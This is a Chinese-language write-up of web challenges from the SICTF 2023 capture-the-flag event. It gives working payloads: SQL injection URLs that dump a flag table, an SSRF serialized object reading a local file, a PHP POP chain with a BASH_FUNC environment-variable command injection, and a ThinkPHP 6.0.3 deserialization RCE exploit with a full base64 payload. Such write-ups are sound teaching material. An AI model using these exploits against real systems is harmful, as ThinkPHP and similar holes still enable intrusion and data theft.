100%_upload

将一句话木马 Base64 编码后上传,然后用 filter 将其 include。

hacker

试了下发现只有 ?username=flag 是有值的,那就接着写 SQL 吧!稍微有点过滤,问题不大:

1
2
3
4
5
6
7
8
view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database())%23
可以查到有这些表: flag, users

view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b,%27,%27,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d)%23
users 表里没啥东西

view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select/**/*/**/from/**/flag)as/**/d)%23
flag 真的在 flag 表里: flag, SICTF{5b6247d8-9e5b-4cbc-a579-9d779fec77ef}

EZ_SSRF

不要相信出题人说 Flag 在 /flag 就可以了:

1
2
3
4
5
6
7
8
9
10
11
12
class client
{
    public $url;
    public $payload;
}

$target = 'file:///var/www/html/flag.php';

$obj = new client();
$obj->url = $target;

echo serialize($obj);

Not just unserialize

POP 链并不难构造:

1
2
3
4
5
6
7
8
$obj = new start();
$obj->you = '233';
$obj->welcome = new SE();
$obj->welcome->year = new CR();
$obj->welcome->year->newyear = "WORRIES";
$obj->welcome->year->last = new ET();

print(base64_encode(serialize($obj)));

有点难度的是利用环境变量进行 RCE,还好有参考资料

1
2
get[BASH_FUNC_echo%%]=%28%29%20%7B%20cat%20%2F%2A%3B%20%7D
                      ^ () { cat /*; }

Oyst3rPHP

这题有源代码泄露直接 www.zip 把它扒下来一看果然是 ThinkPHP。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
public function index()
{
    echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
    echo "<img src='../Oyster.png'" . "/>";

    $payload = base64_decode(@$_POST['payload']);
    $right = @$_GET['left'];
    $left = @$_GET['right'];

    $key = (string)@$_POST['key'];
    if ($right !== $left && md5($right) == md5($left)) {

        echo "Congratulations on getting your first oyster";
        echo "<img src='../Oyster1.png'" . "/>";

        if (preg_match('/.+?THINKPHP/is', $key)) {
            die("Oysters don't want you to eat");
        }
        if (stripos($key, '603THINKPHP') === false) {
            die("!!!Oysters don't want you to eat!!!");
        }

        echo "WOW!!!Congratulations on getting your second oyster";
        echo "<img src='../Oyster2.png'" . "/>";

        @unserialize($payload);
        //最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么???
        //在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!!
        //小Tips:细狗函数┗|`O′|┛ 嗷~~
    }
}

这部分并不难绕,主要还是 ThinkPHP 6.0.3 的反序列化 RCE。网上随便扒个 Exp 下来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => "cat /Oyst3333333r.php"];
    private $withAttr = ["key" => "system"];
}

namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $name;
    public function __construct($obj = "")
    {
        $this->name = $obj;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}

$a = new Pivot();
$b = new Pivot($a);

echo base64_encode(serialize($b));

// fetch("http://yuanshen.life:37154/?left=QNKCDZO&right=240610708", {
//     "headers": { "content-type": "application/x-www-form-urlencoded" },
//     "body": "key=" + "0".repeat(1000000) + "603THINKPHP&payload=TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319",
//     "method": "POST"
// });

This article is authored by Luoingly and is licensed under CC BY-NC 4.0

Permalink: https://luoingly.top/post/sictf-2023-round3-web-writeup/